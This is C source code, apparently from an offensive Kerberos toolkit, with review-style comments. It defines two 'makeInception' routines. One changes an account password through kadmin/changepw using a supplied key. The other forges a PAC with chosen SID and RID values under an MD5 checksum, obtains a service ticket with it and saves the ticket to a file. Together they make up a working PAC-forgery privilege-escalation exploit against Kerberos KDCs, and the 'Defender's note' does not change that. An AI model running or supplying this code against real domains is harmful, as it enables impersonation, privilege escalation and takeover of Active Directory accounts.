/**
 * makeInception (password-change variant).
 *
 * Runs the five exchanges visible below in strict sequence, each gated on
 * the success of the previous one:
 *   1. AS-REQ to @kdc:@port for the "kadmin/changepw" service, using @key;
 *   2. AP-REQ built from the returned ticket and the AS-REP session key
 *      (a fresh sub-key and sequence number come back in subKey/seqNumber);
 *   3. KRB-PRIV wrapping @newpassword, protected with that sub-key;
 *   4. AP-REQ + KRB-PRIV sent to @kdc:@kadminPort, reply decrypted;
 *   5. the decrypted user_data handed to retFromKadmin().
 *
 * Every buffer/PDU/socket acquired on the way is released in reverse
 * order by the label chain at the bottom, whether or not the later steps
 * succeed. Callers own nothing on return. The function reports nothing:
 * failure at any step is silent apart from the "[level n]" progress lines
 * that were already printed.
 *
 * @param user        principal name (project PCSTR; assumed NUL-terminated)
 * @param domain      realm
 * @param newpassword new password, sent as raw bytes inside the KRB-PRIV;
 *                    must not be NULL (strlen on NULL is UB)
 * @param key         long-term key used to decrypt the AS-REP
 * @param kdc         KDC host
 * @param port        KDC port (AS exchange)
 * @param kadminPort  kpasswd/kadmin port (KRB-PRIV exchange)
 *
 * NOTE(review): the sub-key in subKey is never wiped before return — if
 * EncryptionKey holds the key bytes inline, consider zeroizing it in the
 * cleanup chain (confirm the type's layout first).
 * NOTE(review): pwdOctets.length receives a size_t from strlen; if
 * _octet1.length is narrower the assignment truncates silently — confirm.
 */
void makeInception(PCSTR user, PCSTR domain, PCSTR newpassword, EncryptionKey *key, PCSTR kdc, WORD port, WORD kadminPort)
{
	SOCKET kdcSock, adminSock;
	OssBuf asReqBuf, apReqBuf, privReqBuf;
	KDC_REP *asRep;
	AP_REP *apRep;
	KRB_PRIV *privRep;
	EncKDCRepPart *asRepPart;
	EncKrbPrivPart *privRepPart;
	EncryptionKey subKey;
	UInt32 seqNumber;
	_octet1 pwdOctets;

	/* The KRB-PRIV payload is the password text itself, no terminator. */
	pwdOctets.length = strlen(newpassword);
	pwdOctets.value = (unsigned char *) newpassword;

	if (!kull_m_sock_initSocket(kdc, port, &kdcSock)) {
		return;
	}
	kprintf(" [level 1] Reality (AS-REQ)\n");
	/* AS exchange: ask for a ticket to kadmin/changepw with the supplied key. */
	if (!kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, "kadmin", "changepw", NULL, FALSE, NULL, NULL, &asReqBuf)) {
		goto close_kdc;
	}
	if (!kull_m_kerberos_helper_net_callKdcOssBuf(&kdcSock, &asReqBuf, (LPVOID *) &asRep, AS_REP_PDU)) {
		goto free_as_req;
	}
	if (!kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(asRep, &asRepPart, key, EncASRepPart_PDU)) {
		goto free_as_rep;
	}
	kprintf(" [level 2] Van Chase (AP-REQ)\n");
	/* The AP-REQ helper also yields the authenticator sub-key and initial
	 * sequence number that the KRB-PRIV below must use. */
	if (!kull_m_kerberos_asn1_helper_build_ApReq(&apReqBuf, user, domain, &asRep->ticket, &asRepPart->key, KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, &subKey, &seqNumber)) {
		goto free_as_rep_part;
	}
	kprintf(" [level 3] The Hotel (KRB-PRIV - REQ)\n");
	/* "wtf" is passed verbatim as the helper's third argument; its meaning
	 * is defined by build_KrbPriv (presumably an address/host field — confirm). */
	if (!kull_m_kerberos_asn1_helper_build_KrbPriv(&pwdOctets, &subKey, "wtf", &privReqBuf, &seqNumber)) {
		goto free_ap_req;
	}
	/* Second connection: the KRB-PRIV goes to the kadmin port, not the KDC port. */
	if (!kull_m_sock_initSocket(kdc, kadminPort, &adminSock)) {
		goto free_priv_req;
	}
	if (!kull_m_kerberos_helper_net_callKadminOssBuf(&adminSock, &apReqBuf, &privReqBuf, &apRep, &privRep)) {
		goto close_admin;
	}
	kprintf(" [level 4] Snow Fortress (KRB-PRIV - REP)\n");
	if (kull_m_kerberos_asn1_helper_build_EncKrbPrivPart_from_Priv(privRep, &privRepPart, &subKey)) {
		/* The literal contains a real line break in the original source;
		 * it is written here as "\n" so the emitted bytes are the same. */
		kprintf(" [level 5] Limbo ! \n: ");
		retFromKadmin(&privRepPart->user_data);
		kull_m_kerberos_asn1_helper_ossFreePDU(EncKrbPrivPart_PDU, privRepPart);
	}
	kull_m_kerberos_asn1_helper_ossFreePDU(KRB_PRIV_PDU, privRep);
	kull_m_kerberos_asn1_helper_ossFreePDU(AP_REP_PDU, apRep);

	/* Cleanup chain: reverse acquisition order, entered at the first
	 * label whose resource is held. */
close_admin:
	kull_m_sock_termSocket(&adminSock);
free_priv_req:
	kull_m_kerberos_asn1_helper_ossFreeBuf(privReqBuf.value);
free_ap_req:
	kull_m_kerberos_asn1_helper_ossFreeBuf(apReqBuf.value);
free_as_rep_part:
	kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, asRepPart);
free_as_rep:
	kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, asRep);
free_as_req:
	kull_m_kerberos_asn1_helper_ossFreeBuf(asReqBuf.value);
close_kdc:
	kull_m_sock_termSocket(&kdcSock);
}
/**
 * makeInception (PAC / TGS variant).
 *
 * Sequence, each step gated on the previous one:
 *   1. AS-REQ to @kdc:@port for @user with @key, AS-REP decrypted;
 *   2. a PAC is produced by giveMePac() for @sid/@rid, timestamped with
 *      the AS-REP authtime and checksummed with KERB_CHECKSUM_MD5;
 *   3. TGS-REQ for @service/@target, carrying the AS-REP ticket and that
 *      PAC, encrypted under the AS-REP session key;
 *   4-5. the TGS-REP is decrypted and written to @filename as a KRB-CRED.
 *
 * All buffers, PDUs, the PAC allocation and the socket are released in
 * reverse order by the label chain at the bottom on every exit path.
 * Nothing is returned; a failed step is visible only by the absence of
 * the later "[level n]" progress lines and of the output file.
 *
 * Defender's note: the PAC here is client-supplied and carries an MD5
 * checksum (argument on the giveMePac call). A KDC that validates PAC
 * signatures is expected to reject the TGS-REQ; acceptance indicates a
 * hardening gap worth alerting on (inference from the arguments — confirm
 * against giveMePac's behaviour).
 *
 * NOTE(review): a second makeInception with a different signature appears
 * earlier in this listing; C has no overloading, so the two must live in
 * separate translation units — confirm.
 *
 * @param user     principal name
 * @param domain   realm
 * @param sid      domain SID placed in the PAC
 * @param rid      user RID placed in the PAC
 * @param target   service host / realm component of the requested SPN
 * @param service  service class of the requested SPN
 * @param key      long-term key used to decrypt the AS-REP
 * @param kdc      KDC host
 * @param port     KDC port
 * @param filename output path for the KRB-CRED
 */
void makeInception(PCSTR user, PCSTR domain, PSID sid, DWORD rid, PCSTR target, PCSTR service, EncryptionKey *key, PCSTR kdc, WORD port, PCSTR filename)
{
	SOCKET kdcSock;
	OssBuf asReqBuf, tgsReqBuf;
	KDC_REP *asRep, *tgsRep;
	EncKDCRepPart *asRepPart, *tgsRepPart;
	_octet1 pacOctets;

	if (!kull_m_sock_initSocket(kdc, port, &kdcSock)) {
		return;
	}
	kprintf(" [level 1] Reality (AS-REQ)\n");
	/* Plain AS exchange: no service, no ticket, no PAC yet. */
	if (!kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, NULL, NULL, FALSE, NULL, NULL, &asReqBuf)) {
		goto close_kdc;
	}
	if (!kull_m_kerberos_helper_net_callKdcOssBuf(&kdcSock, &asReqBuf, (LPVOID *) &asRep, AS_REP_PDU)) {
		goto free_as_req;
	}
	if (!kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(asRep, &asRepPart, key, EncASRepPart_PDU)) {
		goto free_as_rep;
	}
	kprintf(" [level 2] Van Chase (PAC TIME)\n");
	/* The PAC's timestamp is taken from the AS-REP so it matches the ticket. */
	if (!giveMePac(user, sid, rid, &asRepPart->authtime, KERB_CHECKSUM_MD5, NULL, &pacOctets)) {
		goto free_as_rep_part;
	}
	kprintf(" [level 3] The Hotel (TGS-REQ)\n");
	/* TGS exchange keyed with the AS-REP session key; the AS-REP ticket and
	 * the PAC are both handed to the request builder. */
	if (!kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, &asRepPart->key, service, target, FALSE, &asRep->ticket, &pacOctets, &tgsReqBuf)) {
		goto free_pac;
	}
	if (!kull_m_kerberos_helper_net_callKdcOssBuf(&kdcSock, &tgsReqBuf, (LPVOID *) &tgsRep, TGS_REP_PDU)) {
		goto free_tgs_req;
	}
	if (kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(tgsRep, &tgsRepPart, &asRepPart->key, EncTGSRepPart_PDU)) {
		kprintf(" [level 4-5] Limbo (KRB-CRED)\n");
		kull_m_kerberos_helper_util_SaveRepAsKrbCred(tgsRep, tgsRepPart, filename);
		kull_m_kerberos_asn1_helper_ossFreePDU(EncTGSRepPart_PDU, tgsRepPart);
	}
	kull_m_kerberos_asn1_helper_ossFreePDU(TGS_REP_PDU, tgsRep);

	/* Cleanup chain: reverse acquisition order, entered at the first
	 * label whose resource is held. */
free_tgs_req:
	kull_m_kerberos_asn1_helper_ossFreeBuf(tgsReqBuf.value);
free_pac:
	/* giveMePac's output is a LocalAlloc'd buffer, hence LocalFree here
	 * rather than the OSS free helpers. */
	LocalFree(pacOctets.value);
free_as_rep_part:
	kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, asRepPart);
free_as_rep:
	kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, asRep);
free_as_req:
	kull_m_kerberos_asn1_helper_ossFreeBuf(asReqBuf.value);
close_kdc:
	kull_m_sock_termSocket(&kdcSock);
}